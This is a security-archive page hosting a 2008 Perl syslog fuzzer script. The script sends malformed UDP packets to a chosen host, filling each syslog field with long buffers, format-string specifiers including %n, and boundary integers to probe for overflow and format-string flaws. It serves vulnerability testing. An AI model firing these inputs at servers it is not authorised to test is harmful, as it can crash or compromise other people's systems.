syslog-fuzzer.txt

syslog-fuzzer.txt: Posted Apr 9, 2008; Authored by Jaime Blasco | Site aitsec.com; Syslog Fuzzer is a small perl script tool that is useful for testing some attack vectors against syslog servers. It has support for buffer/integer overflows and format string vulnerabilities.; tags | overflow, perl, vulnerability, fuzzer; MD5 | 7a282e1f7d9772d3b3cb116e108c966c; Download | Favorite | Comments (0)

syslog-fuzzer.txt

#!/usr/bin/perl
#syslog Fuzzer v0.1 
#jaime.blasco@aitsec.com
#www.aitsec.com

use IO::Socket::INET;
use Getopt::Std;
use POSIX qw(strftime);

getopt('hp', \ my %opts );

$SIG{INT}=\&exitz;
print "
\t  Syslog Fuzzer v0.1 by Jaime Blasco (c) 2008
\t        www.aitsec.com
";
if(!defined($opts{h}) or !defined($opts{p})){
  print "
    -h   : Host\n
    -p   : Port Number
  ";
exit
}

$port = $opts{p};
$host = $opts{h};

@bfo = ('A'x10, 'A'x20, 'A'x40, 'A'x80, 'A'x160, 'A'x320, 'A'x640, 'A'x1280, 'A'x3000, 'A'x5000, 'A'x8000, 'A'x12000, 'A'x15000);
@fse = ("%s%p%x%d", ".1024d", "%.2049d", "%p%p%p%p", "%x%x%x%x", "%d%d%d%d", "%s%s%s%s", "%99999999999s",
      "%08x", "%%20d", "%%20n", "%%20x", "%%20s", "%s%s%s%s%s%s%s%s%s%s", "%p%p%p%p%p%p%p%p%p%p",
      "%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%", "%s"x150, "%x"x300);
@int = ("-1", "0", "0x100", "0x1000", "0x3fffffff", "0x7ffffffe", "0x7fffffff", "0x80000000", "0xfffffffe", "0xffffffff", "0x10000", "0x100000");

print "Using host: ".$host."\n";
print "Using port: ".$port."\n";

$con=new IO::Socket::INET->new(PeerPort=>$port,
        Proto=>'udp',
        PeerAddr=>$host);

#http://www.ietf.org/rfc/rfc3164.txt
#udp SYSLOG PACKET looks like:
#<Priority>Header Message text
# Header = Date Hostname PID

$npriority = '<0>';
$ndate = strftime "%b%e %H:%M:%S", localtime;
$nhostname = "10.0.0.2";
$npid = 'fuzzer[10]';
$nmsg = "Syslog Fuzzer v0.1 by Jaime Blasco (c) 2008";

#fuzzing PRI

#Buffer Overflow
foreach (@bfo) {
  $header = $ndate.' '.$nhostname.' '.$npid;
  $packet = '<'.$_.'>'.$header.': '.$nmsg;
  $con->send($packet);
  
  #print $packet;
}
sleep 1;

#Format Strings
foreach (@fse) {
  $header = $ndate.' '.$nhostname.' '.$npid;
  $packet = '<'.$_.'>'.$header.': '.$nmsg;
  $con->send($packet);
  #print $packet;
}
sleep 1;

#Integer Overflows
foreach (@int) {
  $header = $ndate.' '.$nhostname.' '.$npid;
  $packet = '<'.$_.'>'.$header.': '.$nmsg;
  $con->send($packet);
  #print $packet;
}
sleep 1;

#fuzzing header
  
  #fuzzing Date
  
#Buffer Overflow
foreach (@bfo) {
  $header = $_.' '.$nhostname.' '.$npid;
  $packet = $npriority.$header.': '.$nmsg;
  $con->send($packet);
  #print $packet;
}
sleep 1;

#Format Strings
foreach (@fse) {
  $header = $_.' '.$nhostname.' '.$npid;
  $packet = $npriority.$header.': '.$nmsg;
  $con->send($packet);
  #print $packet;
}
sleep 1;

#Integer Overflows
foreach (@int) {
  $header = $_.' '.$nhostname.' '.$npid;
  $packet = $npriority.$header.': '.$nmsg;
  $con->send($packet);
  #print $packet;
}
sleep 1;

  #fuzzing hostname

#Buffer Overflow
foreach (@bfo) {
  $header = $ndate.' '.$_.' '.$npid;
  $packet = $npriority.$header.': '.$nmsg;
  $con->send($packet);
  #print $packet;
}
sleep 1;

#Format Strings
foreach (@fse) {
  $header = $ndate.' '.$_.' '.$npid;
  $packet = $npriority.$header.': '.$nmsg;
  $con->send($packet);
  #print $packet;
}
sleep 1;

#Integer Overflows
foreach (@int) {
  $header = $ndate.' '.$_.' '.$npid;
  $packet = $npriority.$header.': '.$nmsg;
  $con->send($packet);
  #print $packet;
}
sleep 1;

  #fuzzing PID
  
#Buffer Overflow
foreach (@bfo) {
  $header = $ndate.' '.$nhostname.' '.$_;
  $packet = $npriority.$header.': '.$nmsg;
  $con->send($packet);
  #print $packet;
}
sleep 1;

#Format Strings
foreach (@fse) {
  $header = $ndate.' '.$nhostname.' '.$_;
  $packet = $npriority.$header.': '.$nmsg;
  $con->send($packet);
  #print $packet;
}
sleep 1;

#Integer Overflows
foreach (@int) {
  $header = $ndate.' '.$nhostname.' '.$_;
  $packet = $npriority.$header.': '.$nmsg;
  $con->send($packet);
  #print $packet;
}
sleep 1;

#fuzzing msg

#Buffer Overflow
foreach (@bfo) {
  $header = $ndate.' '.$nhostname.' '.$npid;
  $packet = $npriority.$header.': '.$_;
  $con->send($packet);
  #print $packet;
}
sleep 1;

#Format Strings
foreach (@fse) {
  $header = $ndate.' '.$nhostname.' '.$npid;
  $packet = $npriority.$header.': '.$_;
  $con->send($packet);
  #print $packet;
}
sleep 1;

#Integer Overflows
foreach (@int) {
  $header = $ndate.' '.$nhostname.' '.$npid;
  $packet = $npriority.$header.': '.$_;
  $con->send($packet);
  #print $packet;
}

Comments

Subscribe to this comment feed

No comments yet, be the first!

Top Authors In Last 30 Days

Heine Pedersen 29 files
Torben Jensen 29 files
Farbod Mahini 26 files
Ubuntu 26 files
Red Hat 25 files
Debian 24 files
Mandriva 17 files
sinn3r 11 files
the_cyber_nuxbie 10 files
Am!r 9 files

File Archives

Systems

AIX (352)
Apple (963)
BSD (302)
Cisco (1,247)
Debian (3,802)
Fedora (1,660)
FreeBSD (1,024)
Gentoo (2,468)
HPUX (685)
iPhone (95)
IRIX (217)
Juniper (60)
Linux (20,649)
Mac OS X (415)
Mandriva (2,205)
NetBSD (235)
OpenBSD (414)
RedHat (2,431)
Slackware (378)
Solaris (1,472)
SUSE (1,228)
Ubuntu (2,728)
UNIX (6,852)
UnixWare (148)
Windows (4,019)
Other

syslog-fuzzer.txt

syslog-fuzzer.txt

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems

syslog-fuzzer.txt

Share This

syslog-fuzzer.txt

Comments

File Archive:

May 2012

Top Authors In Last 30 Days

File Tags

File Archives

Systems